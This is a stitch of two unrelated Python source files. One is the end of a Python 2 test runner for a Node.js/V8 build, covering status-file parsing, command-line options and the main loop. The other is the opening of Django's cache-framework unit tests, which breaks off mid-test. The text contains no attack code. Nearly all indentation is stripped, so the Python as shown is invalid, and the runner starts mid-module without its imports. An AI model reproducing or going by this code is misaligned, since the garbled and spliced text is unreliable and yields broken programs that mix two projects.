class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
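# Sketch of the status-file syntax the parser above accepts; the rule and
# definition names are hypothetical and only show the four line forms:
#   prefix message
#   [$system == win32]
#   test-foo : PASS,FLAKY
#   def pass_or_fail = PASS || FAIL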
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
      help='write test output to file. NOTE: this only applies to the tap progress indicator')
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--node-args", dest="node_args", help="Args to pass through to Node",
default=[], action="append")
result.add_option("--expect-fail", dest="expect_fail",
help="Expect test cases to fail", default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("-J", help="Run tasks in parallel on all cores",
default=False, action="store_true")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("-r", "--run",
help="Divide the tests in m groups (interleaved) and run tests from group n (--run=n,m with n < m)",
default="")
result.add_option('--temp-dir',
help='Optional path to change directory used for tests', default=False)
result.add_option('--repeat',
help='Number of times to repeat given tests',
default=1, type="int")
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.arch = options.arch.split(',')
options.mode = options.mode.split(',')
options.run = options.run.split(',')
if options.run == [""]:
options.run = None
elif len(options.run) != 2:
print "The run argument must be two comma-separated integers."
return False
else:
try:
options.run = map(int, options.run)
except ValueError:
print "Could not parse the integers from the run argument."
return False
if options.run[0] < 0 or options.run[1] < 0:
print "The run argument cannot have negative integers."
return False
if options.run[0] >= options.run[1]:
print "The test group to run (n) must be smaller than number of groups (m)."
return False
if options.J:
    # Inherit JOBS from the environment if provided; some virtualised systems
    # tend to exaggerate the number of available CPUs/cores.
cores = os.environ.get('JOBS')
options.j = int(cores) if cores is not None else multiprocessing.cpu_count()
if options.flaky_tests not in ["run", "skip", "dontcare"]:
print "Unknown flaky-tests mode %s" % options.flaky_tests
return False
return True
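# Illustrative reading of the --run option validated above: --run=1,4 selects
# the second of four interleaved groups, i.e. (after sorting) every fourth
# test starting at index 1.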
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
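# Example (the path is illustrative): SplitPath turns a test selector into a
# list of glob-style patterns, e.g.
#   SplitPath('parallel/test-fs-*') -> [Pattern('parallel'), Pattern('test-fs-*')]
# and Pattern('test-fs-*').match('test-fs-read') succeeds.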
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
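# Example (the wrapped command is hypothetical): a URL-encoded --special-command
# uses '@' to mark where the original test command is substituted, e.g.
#   expand = GetSpecialCommandProcessor('valgrind%20-q @')
#   expand(['out/Release/node', 'test.js'])
#   -> ['valgrind', '-q', 'out/Release/node', 'test.js']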
BUILT_IN_TESTS = [
'sequential',
'parallel',
'pummel',
'message',
'internet',
'addons',
'gc',
'debugger',
'doctool',
'inspector',
]
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def PrintCrashed(code):
if utils.IsWindows():
return "CRASHED"
else:
return "CRASHED (Signal: %d)" % -code
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile, mode='wb')
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.node_args,
options.expect_fail,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options.repeat)
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for arch in options.arch:
for mode in options.mode:
vm = context.GetVm(arch, mode)
if not exists(vm):
print "Can't find shell executable: '%s'" % vm
continue
archEngineContext = Execute([vm, "-p", "process.arch"], context)
vmArch = archEngineContext.stdout.rstrip()
        if archEngineContext.exit_code != 0 or vmArch == "undefined":
print "Can't determine the arch of: '%s'" % vm
print archEngineContext.stderr.rstrip()
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': vmArch,
}
test_list = root.ListTests([], path, context, arch, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = (
config.ClassifyTests(test_list, env))
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = (
globally_unused_rules.intersection(unused_rules))
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
tempdir = os.environ.get('NODE_TEST_DIR') or options.temp_dir
if tempdir:
try:
os.makedirs(tempdir)
os.environ['NODE_TEST_DIR'] = tempdir
except OSError as exception:
if exception.errno != errno.EEXIST:
print "Could not create the temporary directory", options.temp_dir
sys.exit(1)
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
if SKIP in case.outcomes or SLOW in case.outcomes:
return True
return FLAKY in case.outcomes and options.flaky_tests == SKIP
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if options.run is not None:
    # The list of tests must be sorted before selecting, to avoid silent
    # errors if this file is changed to list the tests in a way that can
    # differ between machines.
cases_to_run.sort(key=lambda c: (c.case.arch, c.case.mode, c.case.file))
cases_to_run = [ cases_to_run[i] for i
in xrange(options.run[0],
len(cases_to_run),
options.run[1]) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import io
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase, mock,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango21Warning
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable(object):
def __getstate__(self):
raise pickle.PickleError()
class UnpicklableType(object):
# Unpicklable using the default pickling protocol on Python 2.
__slots__ = 'a',
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
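# Example (the key, prefix and version values are made up): the custom key
# function produces keys such as
#   custom_key_func('answer', 'p', 2) -> 'CUSTOM-p-2-answer'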
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
    # `params` are test-specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base.keys() if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
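# Sketch of what this helper returns (the backend name is just an example):
#   caches_setting_for_tests(BACKEND='django.core.cache.backends.locmem.LocMemCache')
#   -> {'default':    {'BACKEND': ...},
#       'prefix':     {'BACKEND': ..., 'KEY_PREFIX': 'cacheprefix<pid>'},
#       'v2':         {'BACKEND': ..., 'VERSION': 2},
#       'custom_key': {'BACKEND': ..., 'KEY_FUNCTION': custom_key_func},
#       ...}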
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
        # Mimic a custom ``make_key`` method being defined, since the default
        # one will never trigger the warnings below.
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
cache.set(key, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
self.assertEqual(str(w[0].message.args[0]), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
expected_warning = (
"Cache key contains characters that will cause errors if used "
"with memcached: %r" % key
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
